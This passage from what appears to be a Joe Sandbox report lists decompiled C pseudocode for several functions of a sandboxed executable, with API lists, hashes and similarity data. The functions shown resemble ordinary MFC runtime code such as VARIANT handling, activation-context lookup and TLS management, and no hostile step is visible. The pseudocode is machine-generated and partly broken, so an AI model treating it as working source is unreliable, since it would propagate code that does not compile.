				signed int _t169;
				CHAR* _t173;
				void* _t176;
				void* _t179;
				signed short _t181;
				signed int _t183;
				intOrPtr _t185;
				CHAR* _t188;
				int _t190;
				char* _t193;
				void* _t194;
				void* _t195;
				CHAR* _t196;
				char* _t198;
				void* _t199;
				long long _t204;

				_t199 = __eflags;
				_t185 = __edx;
				_push(0x50);
				E0041F789(E00433621, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t195 - 0x34)) = __ecx;
				E0040DBE0(_t195 - 0x30, _t199,  *((intOrPtr*)(__ecx + 0x1c)));
				_t173 =  *(_t195 + 8);
				_t121 = _t173[8];
				_t187 = 0;
				 *(_t195 - 4) = 0;
				 *(_t195 - 0x1d) = 0;
				 *(_t195 - 0x18) = _t121;
				if(_t121 == 0) {
					 *(_t195 - 0x18) = _t195 - 0x1d;
				}
				_t190 = lstrlenA( *(_t195 - 0x18));
				 *(_t195 - 0x28) = _t173[0x10];
				 *(_t195 - 0x24) = _t173[0xc] & 0x0000ffff;
				if(( *(_t195 + 0xc) & 0x0000000c) == 0) {
					L11:
					_t191 =  *(_t195 + 0x14);
					_t127 = E00401060(_t185,  *(_t191 + 8) << 4);
					__eflags = _t127;
					_pop(_t176);
					if(_t127 != 0) {
						_t191 =  *(_t191 + 8);
						__eflags = _t191 - 0x7ffffff;
						if(_t191 > 0x7ffffff) {
							goto L12;
						}
						_t192 = _t191 << 4;
						E0041E5F0(_t191 << 4);
						 *(_t195 - 0x10) = _t196;
						 *(_t195 - 0x1c) = _t196;
						E0041F330(_t187,  *(_t195 - 0x1c), _t187, _t191 << 4);
						_t198 =  &(_t196[0xc]);
						_t187 = E0041B5F0(_t176, _t187, _t192,  *(_t195 - 0x18),  *(_t195 - 0x24));
						_t49 = _t187 + 0x10; // 0x10
						_t191 = _t49;
						_t135 = E00401060(_t185, _t49);
						__eflags = _t135;
						if(_t135 == 0) {
							L4:
							 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
							if( *(_t195 - 0x2c) == 0) {
								L7:
								L55:
								return E0041F7E5(_t173, _t187, _t191);
							}
							_push( *((intOrPtr*)(_t195 - 0x30)));
							_push(0);
							L6:
							E0040D3B7();
							goto L7;
						}
						E0041E5F0(_t191);
						 *(_t195 - 0x10) = _t198;
						_t173 = 0;
						_t193 = _t198;
						 *((intOrPtr*)(_t195 - 0x58)) = 0x437058;
						 *((intOrPtr*)(_t195 - 0x54)) = 0;
						 *((intOrPtr*)(_t195 - 0x48)) = 0;
						 *((intOrPtr*)(_t195 - 0x4c)) = 0;
						 *((intOrPtr*)(_t195 - 0x50)) = 0;
						_t57 = _t195 - 0x58; // 0x437058
						_push( *(_t195 - 0x1c));
						_push( *((intOrPtr*)(_t195 + 0x18)));
						 *(_t195 - 4) = 1;
						_push( *(_t195 + 0x14));
						_push( *(_t195 - 0x24));
						_push(_t195 - 0x44);
						_push( *(_t195 - 0x18));
						_push(_t193);
						_t140 = E0041BB0F(0,  *((intOrPtr*)(_t195 - 0x34)), _t187, _t193, __eflags);
						__eflags = _t140;
						 *(_t195 - 0x18) = _t140;
						if(_t140 != 0) {
							L26:
							_t191 =  *(_t195 + 0x14);
							_t187 = 0;
							__eflags =  *(_t191 + 8);
							if( *(_t191 + 8) <= 0) {
								L29:
								__eflags =  *(_t195 - 0x18);
								_t85 = _t195 - 0x58; // 0x437058
								_t179 = _t85;
								if( *(_t195 - 0x18) == 0) {
									E0041B9A1(_t179);
									_t142 =  *(_t195 + 0x10);
									__eflags = _t142;
									if(_t142 == 0) {
										_t144 = ( *(_t195 - 0x24) & 0x0000ffff) - 8;
										__eflags = _t144;
										if(_t144 == 0) {
											__imp__#6(_t173);
											L52:
											 *(_t195 - 4) = 0;
											E0041B9F7(_t195 - 0x58);
											 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
											__eflags =  *(_t195 - 0x2c);
											if( *(_t195 - 0x2c) != 0) {
												_push( *((intOrPtr*)(_t195 - 0x30)));
												_push(0);
												E0040D3B7();
											}
											__eflags = 0;
											goto L55;
										}
										_t148 = _t144 - 1;
										__eflags = _t148;
										if(_t148 == 0) {
											L48:
											__eflags = _t173;
											if(_t173 != 0) {
												 *((intOrPtr*)( *_t173 + 8))(_t173);
											}
											goto L52;
										}
										_t151 = _t148 - 3;
										__eflags = _t151;
										if(_t151 == 0) {
											__imp__#9(_t195 - 0x44);
											goto L52;
										}
										__eflags = _t151 != 1;
										if(_t151 != 1) {
											goto L52;
										}
										goto L48;
									}
									_t181 =  *(_t195 - 0x24);
									 *_t142 = _t181;
									_t183 = (_t181 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t183 - 0x13;
									if(_t183 > 0x13) {
										goto L52;
									}
									switch( *((intOrPtr*)(_t183 * 4 +  &M0041C107))) {
										case 0:
											L41:
											 *(__eax + 8) = __bx;
											goto L52;
										case 1:
											 *(__eax + 8) = __ebx;
											goto L52;
										case 2:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 3:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 4:
											__ecx =  *(__ebp - 0x44);
											 *(__eax + 8) =  *(__ebp - 0x44);
											__ecx =  *(__ebp - 0x40);
											 *(__eax + 0xc) = __ecx;
											goto L52;
										case 5:
											__bx =  ~__bx;
											asm("sbb ebx, ebx");
											goto L41;
										case 6:
											__esi = __ebp - 0x44;
											__edi = __eax;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L52;
										case 7:
											goto L52;
										case 8:
											_t142[4] = _t173;
											goto L52;
									}
								}
								 *(_t195 - 4) = 0;
								E0041B9F7(_t179);
								 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
								__eflags =  *(_t195 - 0x2c);
								if( *(_t195 - 0x2c) != 0) {
									_push( *((intOrPtr*)(_t195 - 0x30)));
									_push(0);
									E0040D3B7();
								}
								goto L55;
							}
							do {
								__imp__#9( *(_t195 - 0x1c));
								 *(_t195 - 0x1c) =  &(( *(_t195 - 0x1c))[0x10]);
								_t187 = _t187 + 1;
								__eflags = _t187 -  *(_t191 + 8);
							} while (_t187 <  *(_t191 + 8));
							goto L29;
						}
						_t158 =  *(_t195 - 0x24) & 0x0000ffff;
						__eflags = _t158 - 4;
						_push(_t187);
						_push(_t193);
						_push( *(_t195 - 0x28));
						 *(_t195 - 4) = 2;
						if(_t158 == 4) {
							E0041D49C();
							 *((intOrPtr*)(_t195 - 0x34)) = _t204;
							 *((intOrPtr*)(_t195 - 0x44)) =  *((intOrPtr*)(_t195 - 0x34));
							L25:
							 *(_t195 - 4) = 1;
							goto L26;
						}
						__eflags = _t158 - 5;
						if(_t158 == 5) {
							L23:
							E0041D49C();
							 *((long long*)(_t195 - 0x44)) = _t204;
							goto L25;
						}
						__eflags = _t158 - 7;
						if(_t158 == 7) {
							goto L23;
						}
						__eflags = _t158 + 0xffffffec - 1;
						if(_t158 + 0xffffffec > 1) {
							_t173 = E0041D49C();
						} else {
							 *((intOrPtr*)(_t195 - 0x44)) = E0041D49C();
							 *((intOrPtr*)(_t195 - 0x40)) = _t185;
						}
						goto L25;
					}
					L12:
					 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
					__eflags =  *(_t195 - 0x2c) - _t187;
					if( *(_t195 - 0x2c) == _t187) {
						goto L7;
					}
					_push( *((intOrPtr*)(_t195 - 0x30)));
					_push(_t187);
					goto L6;
				}
				_t19 = _t190 + 3; // 0x3
				_t187 = _t19;
				if(E00401060(_t185, _t19) != 0) {
					E0041E5F0(_t187);
					 *(_t195 - 0x10) = _t196;
					_t188 = _t196;
					_t26 = _t190 + 3; // 0x3
					E00402FAA(_t188, _t190, _t195, _t188, _t26,  *(_t195 - 0x18), _t190);
					_t169 = _t173[0xc] & 0x0000ffff;
					_t196 =  &(_t196[0x10]);
					__eflags = _t169 - 8;
					 *(_t195 - 0x18) = _t188;
					if(_t169 == 8) {
						_t169 = 0xe;
					}
					 *(_t195 - 0x24) =  *(_t195 - 0x24) & 0x00000000;
					_t188[_t190] = 0xff;
					_t194 = _t190 + 1;
					_t188[_t194] = _t169;
					_t188[_t194 + 1] = 0;
					 *(_t195 - 0x28) = _t173[0x14];
					_t187 = 0;
					__eflags = 0;
					goto L11;
				}
				goto L4;
			}

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0041BDFE
lstrlenA.KERNEL32(00000000,000000FF,00000050,00410F22,00000000,00000001,?,?,000000FF,?,?,?), ref: 0041BE30
__alloca_probe_16.LIBCMT ref: 0041BE79

Part of subcall function 00402FAA: _memcpy_s.LIBCMT ref: 00402FBA

__alloca_probe_16.LIBCMT ref: 0041BEF0
_memset.LIBCMT ref: 0041BF00
__alloca_probe_16.LIBCMT ref: 0041BF29
VariantClear.OLEAUT32(?), ref: 0041BFDF

Strings

XpC, xrefs: 0041BF4B, 0041BF4E

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: __alloca_probe_16$ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
String ID: XpC
API String ID: 2586305615-1560596422
Opcode ID: 52af632938839ca9de9910269fe1a11465be98ac3f60d486fab5c827e1cec40d
Instruction ID: fa49f027109238ab1e2c7d572b865a3b51314bf543938ae7db15aad6909c8791
Opcode Fuzzy Hash: 52af632938839ca9de9910269fe1a11465be98ac3f60d486fab5c827e1cec40d
Instruction Fuzzy Hash: EFA19B70800209DBCF11DFE9C885AEEBFB1FF08314F24815AE515B7291D7399A86DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00403901, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403901(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t16 = __esi;
				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x444a68; // 0x1
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					_t20 = _t15;
					if(_t15 == 0) {
						L2:
						E004037E3(0, _t12, _t15, _t16, _t20);
					}
					 *0x444a58 = GetProcAddress(_t15, "CreateActCtxA");
					 *0x444a5c = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x444a60 = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x444a58; // 0x747be4f0
					 *0x444a64 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x444a5c; // 0x74787540
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x444a60; // 0x74787510
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x444a5c; // 0x74787540
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x444a60; // 0x74787510
							if(_t23 == 0) {
								goto L2;
							} else {
								_t20 = _t9;
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x444a68 = 1;
				}
				return _t18;
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,004043B9,000000FF), ref: 00403923
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 00403941
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 0040394E
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 0040395B
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 00403968

Strings

CreateActCtxA, xrefs: 0040393B
ActivateActCtx, xrefs: 00403950
KERNEL32, xrefs: 0040391E
DeactivateActCtx, xrefs: 0040395D
ReleaseActCtx, xrefs: 00403943

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 9e8a6484f6e270b6ce3c1298ae389152113c648ccd4b4fef4a6b7182860f7ced
Instruction ID: 27b4460d09b63384aa497d3741584d63de93aff5ce20b31730bd6aa59633142a
Opcode Fuzzy Hash: 9e8a6484f6e270b6ce3c1298ae389152113c648ccd4b4fef4a6b7182860f7ced
Instruction Fuzzy Hash: 0011C2B59816889FCB20DFA9AC80716BFFCA6D6706710503FE141B2660D6B80A40CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00410BD8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00410BD8(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x443590; // 0x8ffedb05
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E0041E5DF(E00410A89(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

APIs

GetStockObject.GDI32(00000011), ref: 00410BFE
GetStockObject.GDI32(0000000D), ref: 00410C06
GetObjectA.GDI32(00000000,0000003C,?), ref: 00410C13
GetDC.USER32(00000000), ref: 00410C22
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00410C36
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 00410C42
ReleaseDC.USER32 ref: 00410C4E

Strings

System, xrefs: 00410BF9, 00410C63

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 72043efbff939c7958a5be734033e8eee520a78458b03bb95cc432acfe20bf1e
Instruction ID: a4a223aa5b9c112fe65b1d2b54281de720986542eecb78d2bebc38cd9b2bbfe9
Opcode Fuzzy Hash: 72043efbff939c7958a5be734033e8eee520a78458b03bb95cc432acfe20bf1e
Instruction Fuzzy Hash: F5118675700218EBEB149BA1DC45FEF7BB8AF54745F000126F601A7280EBB49D45CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040F361, Relevance: 13.6, APIs: 9, Instructions: 96
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E0040F361(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E0041F71D(E0043284B, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E0040F014(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x436638;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E0040F130( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E0040EAD1(_t51, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E0040EAD1(_t51, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E004037AF(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E0041F330(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E0041F7C2(_t36);
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 0040F368
EnterCriticalSection.KERNEL32(?,00000010,0040F604,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F379
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F397
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040F3CB
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F437
_memset.LIBCMT ref: 0040F456
TlsSetValue.KERNEL32(?,00000000), ref: 0040F467
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F488

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: a30d18387cbfc8e9af3b3761a0f603a792f816b1b476941ececd34ed3563fd41
Instruction ID: caa35618f7ee786639fd244a17305f6c3d39311c605f35e51643f12fe2b3081d
Opcode Fuzzy Hash: a30d18387cbfc8e9af3b3761a0f603a792f816b1b476941ececd34ed3563fd41
Instruction Fuzzy Hash: B331C374400605AFCB20AF50D885CAEB7A4FF54314B20C53FE956A7A90CB34AE95CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0041C1DE, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 118
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0041C1DE(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t42;
				void* _t46;
				void* _t47;
				void* _t52;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t76;
				void* _t96;
				void* _t97;
				intOrPtr* _t98;
				void* _t99;
				short* _t101;
				void* _t102;
				signed int _t103;
				void* _t105;

				_t96 = __edx;
				_t103 = _t105 - 0x8c;
				_t42 =  *0x443590; // 0x8ffedb05
				 *(_t103 + 0x88) = _t42 ^ _t103;
				_t74 =  *((intOrPtr*)(_t103 + 0x98));
				_t101 =  *((intOrPtr*)(_t103 + 0x94));
				_push(_t97);
				E0041F330(_t97, _t101, 0, 0x20);
				 *((intOrPtr*)(_t103 - 0x80)) = _t103 - 0x78;
				_t46 = E0040EC01(_t74, 0x437038);
				_t98 = __imp__#2;
				if(_t46 == 0) {
					_t78 = _t74;
					_t47 = E0040EC01(_t74, "dNC");
					__eflags = _t47;
					_push(0x100);
					_push(_t103 - 0x78);
					if(_t47 == 0) {
						_push(0xf108);
						E0040DDA7(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf108;
					} else {
						_push(0xf10a);
						E0040DDA7(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf10a;
					}
				} else {
					 *((intOrPtr*)(_t103 - 0x80)) =  *((intOrPtr*)(_t74 + 0xc));
					 *_t101 =  *((intOrPtr*)(_t74 + 8));
					 *((intOrPtr*)(_t101 + 0x10)) =  *((intOrPtr*)(_t74 + 0x10));
					 *((intOrPtr*)(_t101 + 0x1c)) =  *((intOrPtr*)(_t74 + 0x1c));
					_t66 =  *((intOrPtr*)(_t74 + 0x14));
					_t111 =  *((intOrPtr*)(_t66 - 0xc));
					if( *((intOrPtr*)(_t66 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E004036AB(_t74, _t103 - 0x7c, _t98, _t101, _t111))), _t66);
						E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
					_t74 =  *((intOrPtr*)(_t74 + 0x18));
					_t113 =  *((intOrPtr*)(_t74 - 0xc));
					if( *((intOrPtr*)(_t74 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E004036AB(_t74, _t103 - 0x7c, _t98, _t101, _t113))), _t74);
						E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				 *((intOrPtr*)(_t101 + 8)) =  *_t98( *((intOrPtr*)(E004036AB(_t74, _t103 - 0x7c, _t98, _t101, _t113))),  *((intOrPtr*)(_t103 - 0x80)));
				_t52 = E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				_t114 =  *((intOrPtr*)(_t101 + 4));
				if( *((intOrPtr*)(_t101 + 4)) == 0) {
					 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E004036AB(0, _t103 - 0x7c, _t98, _t101, _t114))),  *((intOrPtr*)(E0040DB94(0, _t98, _t101, _t114) + 0x10)));
					_t52 = E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				}
				if( *((intOrPtr*)(_t101 + 0xc)) == 0) {
					_t117 =  *((intOrPtr*)(_t101 + 0x10));
					if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E004036AB(0, _t103 - 0x7c, _t98, _t101, _t117))),  *((intOrPtr*)( *((intOrPtr*)(E0040DB94(0, _t98, _t101, _t117) + 4)) + 0x64)));
						_t52 = E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				_pop(_t99);
				_pop(_t102);
				_pop(_t76);
				return E0041E5DF(_t52, _t76,  *(_t103 + 0x88) ^ _t103, _t96, _t99, _t102);
			}

APIs

_memset.LIBCMT ref: 0041C20D
SysAllocString.OLEAUT32(00000000), ref: 0041C25E
SysAllocString.OLEAUT32(00000000), ref: 0041C282

Part of subcall function 004036AB: __EH_prolog3.LIBCMT ref: 004036B2

SysAllocString.OLEAUT32(00000000), ref: 0041C2DA
SysAllocString.OLEAUT32(00000000), ref: 0041C303
SysAllocString.OLEAUT32(00000000), ref: 0041C332

Strings

dNC, xrefs: 0041C294

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: AllocString$H_prolog3_memset
String ID: dNC
API String ID: 842698744-833669199
Opcode ID: 69d7bbd4a819064c98fec3e3c2b11ca80eed0357c1c995ac8036d299fc764d85
Instruction ID: 9748dfd0f260f4af5954bde45890adc7de7677ef7dc0e4187cfbdd75b949ec51
Opcode Fuzzy Hash: 69d7bbd4a819064c98fec3e3c2b11ca80eed0357c1c995ac8036d299fc764d85
Instruction Fuzzy Hash: 394171309002089FCB34EFB9CC91A9EB7B4AF44318F10856FE465A72E2DB79A554CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00417FED, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00417FED(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				short* _t48;
				intOrPtr _t55;
				void* _t56;
				void* _t59;

				_t59 = __eflags;
				_push(4);
				E0041F6EA(E00433268, __ebx, __edi, __esi);
				_t55 = __ecx;
				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
				E004048ED(__ecx, _t59);
				 *(__ecx + 0x2c) =  *(__ecx + 0x2c) | 0xffffffff;
				 *((intOrPtr*)(_t56 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x436c84;
				 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(_t56 + 8));
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x50)) = 0;
				 *((intOrPtr*)(__ecx + 0x54)) = 0;
				 *((intOrPtr*)(__ecx + 0x58)) = 0;
				 *((intOrPtr*)(__ecx + 0x5c)) = 0;
				 *((intOrPtr*)(__ecx + 0x60)) = 0;
				 *((intOrPtr*)(__ecx + 0x64)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) = 0;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x88)) = 0;
				 *((intOrPtr*)(__ecx + 0x8c)) = 0;
				 *((intOrPtr*)(__ecx + 0x90)) = 0;
				 *((intOrPtr*)(__ecx + 0x94)) = 0;
				 *((intOrPtr*)(__ecx + 0x98)) = 0;
				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
				 *((intOrPtr*)(__ecx + 0xa0)) = 0;
				E00402890(__ecx + 0xa4);
				 *((char*)(_t56 - 4)) = 1;
				 *((intOrPtr*)(__ecx + 0xa8)) = 0;
				E0041C6AB(__ecx + 0xbc);
				 *((intOrPtr*)(__ecx + 0xc4)) = 0;
				 *((intOrPtr*)(__ecx + 0xc8)) = 0x436ab8;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0x436c04;
				 *((intOrPtr*)(__ecx + 0xd0)) = 0x436ae0;
				 *((intOrPtr*)(__ecx + 0xd4)) = 0x436b0c;
				 *((intOrPtr*)(__ecx + 0xd8)) = 0x436b2c;
				 *((intOrPtr*)(__ecx + 0xdc)) = 0x436b44;
